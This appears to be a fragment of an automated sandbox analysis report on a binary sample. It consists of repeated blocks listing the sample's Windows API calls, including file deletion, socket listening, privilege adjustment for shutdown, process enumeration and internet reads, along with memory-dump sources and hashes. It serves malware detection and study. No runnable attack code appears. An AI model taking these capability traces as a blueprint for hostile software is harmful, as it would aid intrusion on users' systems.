                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 3b7ef83508b85ca0ae746f092d86b98d641b7f7043c328c0a8790615005e94b3
                                                      • Instruction ID: 46ef195cc2b95d6cd97def573515732e19a93c50c26f43d62c2c102718d2f021
                                                      • Opcode Fuzzy Hash: 3b7ef83508b85ca0ae746f092d86b98d641b7f7043c328c0a8790615005e94b3
                                                      • Instruction Fuzzy Hash: 8A21AE352002509FDB11EFA0ED49BAA77B8EF48710F14802AF906DB2B1CB34AD02CB54
                                                      APIs
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                        • Part of subcall function 00AC4CD3: GetFileAttributesW.KERNEL32(?,00AC3947), ref: 00AC4CD4
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00AC3ADF
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00AC3B87
                                                      • MoveFileW.KERNEL32(?,?), ref: 00AC3B9A
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AC3BB7
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AC3BD9
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00AC3BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: 361af4078772b418b073b026e5436e434d575a1ecf6b54d8fb76e1c2a08d8510
                                                      • Instruction ID: 5960d007a2600187b320ecb52b536074259330296349816c9e08101646749c16
                                                      • Opcode Fuzzy Hash: 361af4078772b418b073b026e5436e434d575a1ecf6b54d8fb76e1c2a08d8510
                                                      • Instruction Fuzzy Hash: CB513F328052499ECF15EBE0DE92EEDB779AF14304F6481A9E44277091EF316F09CBA0
                                                      APIs
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00ACF6AB
                                                      • Sleep.KERNEL32(0000000A), ref: 00ACF6DB
                                                      • _wcscmp.LIBCMT ref: 00ACF6EF
                                                      • _wcscmp.LIBCMT ref: 00ACF70A
                                                      • FindNextFileW.KERNEL32(?,?), ref: 00ACF7A8
                                                      • FindClose.KERNEL32(00000000), ref: 00ACF7BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 713712311-438819550
                                                      • Opcode ID: 2c3cad9c1dcd1cb703a9d81bbd5ff2f595ba18a1b65311c1d9eb424b30e6116d
                                                      • Instruction ID: d641b4d34eb6513c3d44ba67a57cfc961ee7f2610e191bb8ad2192291077dcc9
                                                      • Opcode Fuzzy Hash: 2c3cad9c1dcd1cb703a9d81bbd5ff2f595ba18a1b65311c1d9eb424b30e6116d
                                                      • Instruction Fuzzy Hash: 8F415A7190020AAFCF15DFA4CD89EEEBBB5FF05310F14456AE815A71A1EB309A54CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 053c7b626711aed848b7ec39c758bdef4fec733e524defbce73b84ab3a86823e
                                                      • Instruction ID: 475c29181d24e58f44539ba01c6f9058d930063bbb778466c742b0587fc6d23c
                                                      • Opcode Fuzzy Hash: 053c7b626711aed848b7ec39c758bdef4fec733e524defbce73b84ab3a86823e
                                                      • Instruction Fuzzy Hash: 8EA27D70E0421ACBDF24CF58CD907AEB7B1BB59314F24C1AAD95AA7680E7349E81CF51
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: c4c78a7e5b3305e3ee4d5f94109be1f4b36950afcb58907badac87c4f0014342
                                                      • Instruction ID: 51abaa3b65c74f3832c770bdeaedfe2ff27860d3baf1cccf7c47f2955776e498
                                                      • Opcode Fuzzy Hash: c4c78a7e5b3305e3ee4d5f94109be1f4b36950afcb58907badac87c4f0014342
                                                      • Instruction Fuzzy Hash: 6E125970E00609DFDF14DFA5DA85AEEB7B9FF48300F208669E40AA7251EB35AD15CB50
                                                      APIs
                                                        • Part of subcall function 00AB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AB8D0D
                                                        • Part of subcall function 00AB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AB8D3A
                                                        • Part of subcall function 00AB8CC3: GetLastError.KERNEL32 ref: 00AB8D47
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00AC549B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: dbfbaa2c9012ab0ef423a39e78b08e3e4337e6434140a1aed506d98dc38a76e1
                                                      • Instruction ID: b91bd9b2e7c61413d5fa1eafba869b911fde94f4cc2f7e92e1118a77ea5f6313
                                                      • Opcode Fuzzy Hash: dbfbaa2c9012ab0ef423a39e78b08e3e4337e6434140a1aed506d98dc38a76e1
                                                      • Instruction Fuzzy Hash: D9014C31E55A011EE72C5378DE4AFB6726DEB01342F210028FC16D60D3DA547CC08690
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AD65EF
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD65FE
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00AD661A
                                                      • listen.WSOCK32(00000000,00000005), ref: 00AD6629
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6643
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00AD6657
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 5283cadfd440ede0e195d340a87343762c8a1aaa028a8fa7c6e5686464ac2174
                                                      • Instruction ID: 2b8f7acb1068a3a35ba829cebaec6515728c169dc05a9134504741d5913f811d
                                                      • Opcode Fuzzy Hash: 5283cadfd440ede0e195d340a87343762c8a1aaa028a8fa7c6e5686464ac2174
                                                      • Instruction Fuzzy Hash: 9A219C312002009FDB14EFA4C989B6EB7B9EF48720F14816AE957AB3D1CB70AD028B51
                                                      APIs
                                                        • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00A619FA
                                                      • GetSysColor.USER32(0000000F), ref: 00A61A4E
                                                      • SetBkColor.GDI32(?,00000000), ref: 00A61A61
                                                        • Part of subcall function 00A61290: DefDlgProcW.USER32(?,00000020,?), ref: 00A612D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      • Opcode ID: 35cf75c23fa7ee406052f7ad27344bad224076f11c35eabac8f3d32875628ec2
                                                      • Instruction ID: 37e597727b1d7ac04347ea594b3d6a96d0a4fb47afcafb7298fe1a1c66cad50a
                                                      • Opcode Fuzzy Hash: 35cf75c23fa7ee406052f7ad27344bad224076f11c35eabac8f3d32875628ec2
                                                      • Instruction Fuzzy Hash: 1CA16971215584BEDB38AB69AE88DBF3DFCDB55396F1C011AF412D61D2CE248D02D2B2
                                                      APIs
                                                        • Part of subcall function 00AD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00AD80CB
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00AD6AB1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6ADA
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00AD6B13
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6B20
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00AD6B34
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: 4d38a04ca6a6e59f96eb7d89de8d75d5db9498563f3fd5f9e8227ed937869e50
                                                      • Instruction ID: ad8ec39c30c7970775c5b5a435b97b56cfdac66d8e005b519d24284c8f11e611
                                                      • Opcode Fuzzy Hash: 4d38a04ca6a6e59f96eb7d89de8d75d5db9498563f3fd5f9e8227ed937869e50
                                                      • Instruction Fuzzy Hash: 4941C075B00210AFEB10AF64DD86F6E77B9DB48720F04815DF95AAB3D2CA749D018791
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 73bd66243c0ad47611c78d8053e793b0050a7ac421f42b61287558d98284571f
                                                      • Instruction ID: c73666ee6f3cc054c4039ffdff93dd9e0adf2fd969456ea1f7bc5afda224275c
                                                      • Opcode Fuzzy Hash: 73bd66243c0ad47611c78d8053e793b0050a7ac421f42b61287558d98284571f
                                                      • Instruction Fuzzy Hash: 5611C432B009906FEB216F77EC44A2FB7ADFF54765B484429F806DB241CB7499028AA4
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00AA1D88,?), ref: 00ADC312
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00ADC324
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: 21acf796842af56f1520897c9849352478b57965552bd50b2041f6d35755e288
                                                      • Instruction ID: 2a982e8a77650571a1e83983fce1a75fa28f97f9334bdd7aa5a2be9a6c0d4248
                                                      • Opcode Fuzzy Hash: 21acf796842af56f1520897c9849352478b57965552bd50b2041f6d35755e288
                                                      • Instruction Fuzzy Hash: EAE08C70201703CFCB208B65D848A86B6D4FB08324BC0C83AE896CA220E770D881CB60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID:
                                                      • API String ID: 674341424-0
                                                      • Opcode ID: 80ec4d9f733b4a5c4a9387b88426e025a7bb5bb76558f2344ccdf7a2406d129f
                                                      • Instruction ID: 148d59270f4103f0b98f4b314c4fbd8a44b2644682c37ef9044e07384c404513
                                                      • Opcode Fuzzy Hash: 80ec4d9f733b4a5c4a9387b88426e025a7bb5bb76558f2344ccdf7a2406d129f
                                                      • Instruction Fuzzy Hash: D1228D726083019FCB24DF24C991BAFB7F4AF85700F15891DF49A9B291DB71EA04CB92
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00ADF151
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00ADF15F
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00ADF21F
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00ADF22E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: eab1ca0a3853b5691ba078718d52106228b65cb35a027d2845b242d7ab93faaa
                                                      • Instruction ID: 5b5530361ae7f0347f17815e5cbf09f71f4df3906bc7c5095d6e11fb4cb5dc07
                                                      • Opcode Fuzzy Hash: eab1ca0a3853b5691ba078718d52106228b65cb35a027d2845b242d7ab93faaa
                                                      • Instruction Fuzzy Hash: E0518C71504301AFD310EF20DC85E6BBBF8EF98750F54492DF596972A1EB70A908CB92
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AC40D1
                                                      • _memset.LIBCMT ref: 00AC40F2
                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AC4144
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AC414D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                      • String ID:
                                                      • API String ID: 1157408455-0
                                                      • Opcode ID: 75ad193a3e4e142ffea5760bf2e8397ea7cc946e32421548db18de4a139086a8
                                                      • Instruction ID: f98942b8d7625d7a1949de3c844262579dbf97add52283d8dc21691220334816
                                                      • Opcode Fuzzy Hash: 75ad193a3e4e142ffea5760bf2e8397ea7cc946e32421548db18de4a139086a8
                                                      • Instruction Fuzzy Hash: 2311AB759412287AD7309BA5AC4DFEBBB7CEF44760F10429AF908D7180D6744E808BA4
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00ABEB19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: a69232d8a82d7f8d76fd156f3c3a9b61866d915b0cfde6fd00fb138dfc90e9f4
                                                      • Instruction ID: 673130881462f61810b90b98484d86a3c699ba5284b27fd4d7a4302fd7601960
                                                      • Opcode Fuzzy Hash: a69232d8a82d7f8d76fd156f3c3a9b61866d915b0cfde6fd00fb138dfc90e9f4
                                                      • Instruction Fuzzy Hash: 13322775A007059FD728DF29C4819AAB7F5FF48310B15C56EE49ADB3A2E770E941CB40
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00AD26D5
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AD270C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: 5aaa3c2aca7c98aab28b36a940ae4c56670f9e75267a1cb8a5cfdaefd1a30def
                                                      • Instruction ID: a516df8a197007e5a14617a13f1a91a6a9b243dc724091faaba5e114eee431ce
                                                      • Opcode Fuzzy Hash: 5aaa3c2aca7c98aab28b36a940ae4c56670f9e75267a1cb8a5cfdaefd1a30def
                                                      • Instruction Fuzzy Hash: 7C41AF75900309BFEB209B94DD85FBBB7BCEB50724F10406BFA02A6240EA71DE41D764
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ACB5AE
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00ACB608
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00ACB655
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      APIs
                                                        • Part of subcall function 00A80FF6: std::exception::exception.LIBCMT ref: 00A8102C
                                                        • Part of subcall function 00A80FF6: __CxxThrowException@8.LIBCMT ref: 00A81041
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AB8D0D
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AB8D3A
                                                      • GetLastError.KERNEL32 ref: 00AB8D47
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00AC4C2C
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AC4C43
                                                      • FreeSid.ADVAPI32(?), ref: 00AC4C53
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ACC966
                                                      • FindClose.KERNEL32(00000000), ref: 00ACC996
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00AD977D,?,00AEFB84,?), ref: 00ACA302
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00AD977D,?,00AEFB84,?), ref: 00ACA314
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
